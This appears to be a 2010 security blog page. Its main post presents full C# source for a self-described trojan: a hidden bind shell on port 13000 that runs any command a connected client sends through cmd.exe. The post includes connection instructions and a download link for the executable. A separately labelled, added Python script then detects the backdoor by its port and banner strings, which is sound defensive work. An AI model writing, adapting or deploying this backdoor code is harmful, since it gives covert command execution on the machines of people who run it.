Hi folks! This is an update about the automatic SQL injection tool I started developing.
My first intention was to develop a simple automatic injection tool; then, when I started developing it, I found it to be far from simple. That is why I decided to join forces with my colleague Raviv Raz, who previously developed Multinjector. We intend to greatly improve and extend its functionality. You can read all about it at Raviv's blog. Updates and code reviews will be posted by me later on.
Have a good weekend,
-Herzel
Thursday, May 20, 2010
Saturday, May 1, 2010
My own C# trojan - remote shell command execution
In this post I will present a simple "shell" I created using C#/.NET.
The trojan runs in the background, opens a listening port on the machine running it and allows any connected client to execute remote shell commands.
This application is for educational purposes only (mostly my own).
How to use it?
Simply run the trojan on the target machine and connect to it on port 13000 using telnet or netcat (as written, the code binds to 127.0.0.1, so the connection has to come from the same machine). After the connection has been established, you may execute any shell command on the target machine:
code:

    using System;
    using System.Diagnostics;
    using System.Net;
    using System.Net.Sockets;

    class Program
    {
        [STAThread]
        static void Main()
        {
            ProcessStartInfo processInfo;
            Process process;
            TcpListener server = null;
            bool isFirst = true;
            try
            {
                // Set the TcpListener on port 13000.
                Int32 port = 13000;
                // Bind to the loopback address only, so the listener is reachable
                // from the local machine.
                IPAddress localAddr = IPAddress.Parse("127.0.0.1");
                server = new TcpListener(localAddr, port);
                // Start listening for client requests.
                server.Start();
                // Buffer for reading data
                Byte[] bytes = new Byte[256];
                String command = "";
                int i;
                string recv_char;
                byte[] msg;
                // Perform a blocking call to accept a single client.
                TcpClient client = server.AcceptTcpClient();
                // Get a stream object for reading and writing
                NetworkStream stream = client.GetStream();
                // Say hello
                msg = System.Text.Encoding.ASCII.GetBytes("Welcome Master! enter a command to execute or enter exit:\r\n");
                stream.Write(msg, 0, msg.Length);
                // Enter the command loop.
                while (true)
                {
                    if (!isFirst)
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes("Enter a command:\r\n");
                        stream.Write(msg, 0, msg.Length);
                    }
                    // reset the command
                    command = "";
                    // Read until a newline arrives (the client's line ending is kept).
                    while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
                    {
                        // Translate data bytes to an ASCII string.
                        recv_char = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
                        command += recv_char;
                        if (command.Contains("\n")) break;
                    }
                    // Read returned 0 without any data: the client disconnected.
                    if (command.Length == 0)
                    {
                        client.Close();
                        break;
                    }
                    if (command.Equals("exit\r\n"))
                    {
                        // If exit entered shutdown and end connection
                        msg = System.Text.Encoding.ASCII.GetBytes("Bye Bye Master...\r\n");
                        stream.Write(msg, 0, msg.Length);
                        client.Close();
                        break;
                    }
                    // execute the command received (/C to terminate cmd.exe after execution):
                    processInfo = new ProcessStartInfo("cmd.exe", "/C " + command);
                    processInfo.CreateNoWindow = true;          // don't open a window
                    processInfo.RedirectStandardOutput = true;  // capture the output instead of writing it to a console
                    processInfo.UseShellExecute = false;        // required for output redirection
                    process = Process.Start(processInfo);       // start the process
                    string output = process.StandardOutput.ReadToEnd();
                    process.Close();                            // close the process
                    isFirst = false;
                    // Note: ReadToEnd never returns null, so the failure branch below is never taken;
                    // a command that produces no output simply yields an empty line.
                    if (output != null)
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes(output + "\n");
                        // Send back a response.
                        stream.Write(msg, 0, msg.Length);
                    }
                    else
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes("Sorry Master, command execution failed\r\n");
                        // Send back a response.
                        stream.Write(msg, 0, msg.Length);
                    }
                }
            }
            catch
            {
                // do nothing
            }
            finally
            {
                // Stop listening for new clients.
                server.Stop();
            }
        }
    }

You may download the executable file from here.
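As an added defender-side example (not code from the post or from its author), the Python below turns the listener's fixed artifacts into detection logic: it flags a TCP listener that is not on a host's expected-port allowlist in a netstat-style listing, and it matches captured server-to-client payloads against the greeting, prompt and farewell strings the code sends. The port and the marker strings come from the post's code; the allowlist, the netstat listing and the payload capture are constructed sample data.

```python
"""
Added example (not from the original post): host- and network-side detection
of the backdoor described above. Indicators (port 13000, banner strings) are
taken from the post's code; the allowlist and sample data are constructed.
"""
import re

# Indicators lifted from the post's code: the hard-coded port and the fixed
# strings the listener writes to a connected client.
BACKDOOR_PORT = 13000
BANNER_MARKERS = (
    b"Welcome Master!",          # greeting sent right after the accept
    b"Enter a command:",         # prompt sent before every later command
    b"Bye Bye Master",           # farewell sent on "exit"
    b"Sorry Master, command execution failed",
)

# Ports the host is expected to listen on (hypothetical allowlist).
EXPECTED_LISTENERS = {135, 445, 3389}

# Constructed sample of `netstat -ano` output on a Windows host.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:13000        0.0.0.0:0              LISTENING       4120
  TCP    192.168.1.10:49731     93.184.216.34:443      ESTABLISHED     2212
"""

# One LISTENING line of the netstat table: local address, port and owning PID.
NETSTAT_LINE = re.compile(
    r"^\s*TCP\s+(?P<addr>[\d.]+):(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)


def unexpected_listeners(netstat_text, expected=EXPECTED_LISTENERS):
    """Return (address, port, pid) for every TCP listener not on the allowlist."""
    findings = []
    for line in netstat_text.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue
        port = int(m.group("port"))
        if port not in expected:
            findings.append((m.group("addr"), port, int(m.group("pid"))))
    return findings


def classify_payload(payload):
    """Return the backdoor marker strings found in one server->client payload."""
    return [marker.decode() for marker in BANNER_MARKERS if marker in payload]


def scan_stream(payloads):
    """Run classify_payload over captured payloads and return one alert per hit."""
    alerts = []
    for idx, data in enumerate(payloads):
        hits = classify_payload(data)
        if hits:
            alerts.append({"segment": idx, "markers": hits})
    return alerts


# Constructed sample capture: what a client sees across one session with the
# post's listener, plus an unrelated HTTP response that must not alert.
SAMPLE_PAYLOADS = [
    b"Welcome Master! enter a command to execute or enter exit:\r\n",
    b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n",
    b"Enter a command:\r\n",
    b"Bye Bye Master...\r\n",
]

if __name__ == "__main__":
    for addr, port, pid in unexpected_listeners(SAMPLE_NETSTAT):
        note = "  <- matches the post's hard-coded port" if port == BACKDOOR_PORT else ""
        print(f"unexpected listener {addr}:{port} (pid {pid}){note}")
    for alert in scan_stream(SAMPLE_PAYLOADS):
        print(f"segment {alert['segment']}: backdoor markers {alert['markers']}")
```

The port check alone is weak evidence (any program may pick 13000), which is why the payload markers are kept separate: a listener on an unexpected port that also emits the greeting text is a much stronger signal than either indicator on its own, and the same marker list can be pasted into a network IDS content rule.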
Oh.. and don't forget to kill that process when you finish playing with it :)
-herzel